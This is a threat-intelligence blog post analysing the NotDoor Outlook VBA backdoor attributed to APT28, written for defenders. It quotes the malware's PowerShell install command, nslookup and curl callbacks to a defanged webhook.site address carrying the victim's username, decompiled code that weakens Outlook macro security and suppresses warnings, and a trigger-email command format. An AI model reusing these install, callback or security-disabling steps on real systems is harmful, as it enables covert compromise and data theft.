Resources | Picus Security

NotDoor Backdoor Analysis Uncovering APT28 Data Theft

Written by Picus Labs | Dec 2, 2025 8:00:00 AM

A novel backdoor targeting Microsoft Outlook, identified as "NotDoor" and also known as Cordyceps or GONEPOSTAL, has been attributed to the persistent threat group APT28. This group is linked to Russian intelligence services and has a history of compromising companies across various sectors in NATO member countries. The malware functions as a VBA macro designed to monitor incoming emails for specific trigger words, enabling attackers to exfiltrate data, upload files, and execute commands on compromised systems.

In this blog, we will analyze the infection chain of this new backdoor attributed to the APT28 group, detailing the DLL side-loading technique that exploits a legitimate Microsoft OneDrive binary. We will further examine the persistence mechanisms established through Windows Registry modifications, the obfuscation tactics employed to evade detection, and the command-and-control infrastructure that leverages email-based triggers for data exfiltration.

What Techniques Does NotDoor Use?

The Loading Mechanism

To evade standard detection mechanisms, the backdoor is deployed via a legitimate, signed binary: Microsoft OneDrive.exe. The execution chain initiates when the legitimate process loads a malicious DLL named SSPICLI.dll. This DLL is responsible for disabling macro security protections and installing the VBA backdoor.

It is understood that the attacker places the backdoor configuration or payload in c:\programdata\testtemp.ini prior to execution. The loader subsequently executes three PowerShell commands, encoded in Base64, to finalize the installation and verify connectivity [1].

  1. Payload Installation: The first command copies the malicious configuration file to the Outlook VBA project location. This directory contains the macros that Outlook executes automatically.

$a=$env:APPDATA;copy c:\programdata\testtemp.ini "$a\Microsoft\Outlook\VbaProject.OTM"
  1. Execution Verification (DNS Hooking): The second command utilizes nslookup to query a domain constructed using the victim's username. This interacts with webhook.site, a service previously observed in campaigns by this group. This action signals to the attacker that the code has successfully executed on the specific machine.

nslookup "$env:USERNAME.910cf351-a05d-4f67-ab8e-6f62cfa8e26d.dnshook[.site"
  1. Execution Verification (HTTP Request): The third command performs a similar verification function by sending a curl request to a specific URL.

cmd /c curl "hxxp://webhook[.site/910cf351-a05d-4f67-ab8e-6f62cfa8e26d?$env:USERNAME"

Persistence and Registry Manipulation

The loader establishes persistence and modifies the environment to ensure the malicious macros run without user interference.

Enabling Macros on Boot

The LoadMacroProviderOnBoot subkey is enabled to ensure the macro provider loads when the application starts. Analysis of the underlying code reveals calls to RegSetKeyValueW targeting the Software\Microsoft\Office\16.0\Outlook key [1]:

sub_180001D60(lpValueName, L"LoadMacroProviderOnBoot");
sub_180001D60(Block, L"Software\\Microsoft\\Office\\16.0\\Outlook");
Data = 1;
v8 = (const WCHAR *)lpValueName;
if ( v28 > 7 )
  v8 = lpValueName[0];
v9 = Block;
if ( v25 > 7 )
  v9 = (void **)Block[0];
RegSetKeyValueW(HKEY_CURRENT_USER, (LPCWSTR)v9, v8, 4u, &Data, 4u);

Also, the malware leverages Application_MAPILogonComplete and Application_NewMailEx events. This ensures code execution occurs whenever Outlook is launched or when a new email is received [1].

Disabling Security Protections

To bypass security warnings, the loader modifies the Level subkey found under Software\Microsoft\Office\16.0\Outlook\Security [2]. The malware code explicitly assigns values to this key to reduce restrictions on macro execution [1].

sub_180001D60(lpValueName, L"Level");
sub_180001D60(Block, L"Software\\Microsoft\\Office\\16.0\\Outlook\\Security");
Data = 1;
v12 = (const WCHAR *)lpValueName;
if ( v28 > 7 )
  v12 = lpValueName[0];
v13 = Block;
if ( v25 > 7 )
  v13 = (void **)Block[0];
RegSetKeyValueW(HKEY_CURRENT_USER, (LPCWSTR)v13, v12, 4u, &Data, 4u);

Suppressing Dialogs

A specific modification is made to the PONT_STRING registry key [2]. This key stores a list of dialog box identifiers that the user has chosen to suppress (the "Don't show this message again" functionality). By programmatically altering this value, the attackers disable specific pop-ups that might otherwise alert the user to unauthorized actions.

sub_180001D60(lpValueName, L"32,");
sub_180001D60(v26, L"PONT_STRING");
sub_180001D60(Block, L"Software\\Microsoft\\Office\\16.0\\Outlook\\Options\\General");
lpData = lpValueName;
if ( v25 > 7 )
  lpData = (LPCWSTR *)lpValueName[0];
v14 = (const WCHAR *)v26;
if ( v27 > 7 )
  v14 = v26[0];
v15 = Block;
if ( v22 > 7 )
  v15 = (void **)Block[0];
RegSetKeyValueW(HKEY_CURRENT_USER, (LPCWSTR)v15, v14, 1u, lpData, 2 * v24 + 2);

Obfuscation and Evasion Techniques

To hinder analysis, the project is heavily obfuscated. Variable and function names are replaced with random alphabetic strings. Furthermore, a unique string encoding technique is employed for internal data. Random alphanumeric characters are prepended to valid Base64 strings [1]. An example given below:

ztwkgbsShBFETNo = 6000
zFwFYJLbRRNeBKb = "Nothing"
evnDTwIHumUhLMY = "oQNFwDdmfdvnOnYQAuAG0AYQB0AHQAaQA0ADQANABAAHAAcgBvAHQAbwBuAC4AbQB1AA=="
evnDTwIHumUhLMY = lcOLQUZAruDrLrW(Mid(evnDTwIHumUhLMY, hywLHvMvcAEpWDW + 1))

Upon a successful login event, the malware creates a working directory at %TEMP%\Temp. This folder acts as a staging ground for artifacts. If files exist in this directory during startup, the malware attempts to exfiltrate them immediately. These files are emailed to a.matti444@proton[.me [1].

Operational Behavior and Exfiltration

Upon a successful login event, the malware creates a working directory at %TEMP%\Temp. This folder acts as a staging ground for artifacts. If files exist in this directory during startup, the malware attempts to exfiltrate them immediately. These files are emailed to a.matti444@proton[.me [1].

The backdoor also parses incoming emails for a specific string located on a designated line. In the analyzed sample, the trigger phrase is "Daily Report". However, the code structure allows for configurable triggers [1].

Dim QZAiyhHDeDiozCo() As String
ReDim QZAiyhHDeDiozCo(0)
QZAiyhHDeDiozCo(0) = "QWVu..." ' Daily Report

Once the trigger is identified, the email is parsed for commands and subsequently deleted to remove evidence.

The malicious emails follow a strict structure required for the backdoor to interpret commands.

  • ID: A numerical identifier.
  • Recipient: An email address for exfiltration, encrypted using the malware’s custom encryption algorithm.
  • Commands: One or more commands, encrypted with the same custom algorithm.

Example trigger email [1]:

Lorem ipsum dolor sit amet...
[...truncated text...]
Daily Report             <-- Trigger
1234                     <-- ID
2                        <-- Number of commands
1fhVwhCk7eRzFGTgBvAHQAaABpAG4AZwA=  <-- Encrypted Recipient
291Y1UCBEY6Uz0dQ...      <-- Encrypted Commands

The backdoor supports four primary functions: executing system commands with the output returned as an attachment, running commands silently without returning data, exfiltrating files from the victim machine, and uploading files directly onto the target system [1].

Results are sent back to the attacker with a subject line formatted as: Re: <ID> <EMAIL SUBJECT> [1].

How Picus Simulates NotDoor Backdoor Attacks?

We also strongly suggest simulating NotDoor Backdoor Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other backdoors, such as RomCom, BRICKSTORM, YiBackdoor, and Rustonotto, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for the NotDoor Backdoor Campaign:

Threat ID

Threat Name

Attack Module

70868

GONEPOSTAL Malware Campaign

Windows Endpoint

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

Key Takeaways

  • NotDoor is a VBA macro backdoor deployed through DLL side loading using a legitimate OneDrive.exe that loads a malicious SSPICLI.dll.
  • The loader installs the payload, disables macro security, and verifies execution through Base64 encoded PowerShell commands using DNS and HTTP callbacks.
  • Persistence is achieved by modifying Outlook registry keys to auto-load macros, weaken security settings, and suppress warning dialogs.
  • The malware employs obfuscation through randomized identifiers and modified Base64 strings, along with a hidden working directory for staging data.
  • Exfiltration and command execution are triggered via specially crafted incoming emails containing encoded recipients and commands.
  • Supported operations include command execution, silent tasking, file exfiltration, and file upload, with results returned to the attacker via email.

References

[1] “Analyzing NotDoor: Inside APT28’s Expanding Arsenal.” Accessed: Nov. 18, 2025. [Online]. Available: https://lab52.io/blog/analyzing-notdoor-inside-apt28s-expanding-arsenal/

[2] R. Tait, “NotDoor Insights: A Closer Look at Outlook Macros and More,” Splunk. Accessed: Nov. 18, 2025. [Online]. Available: https://www.splunk.com/en_us/blog/security/notdoor-insights-a-closer-look-at-outlook-macros-and-more.html
View full post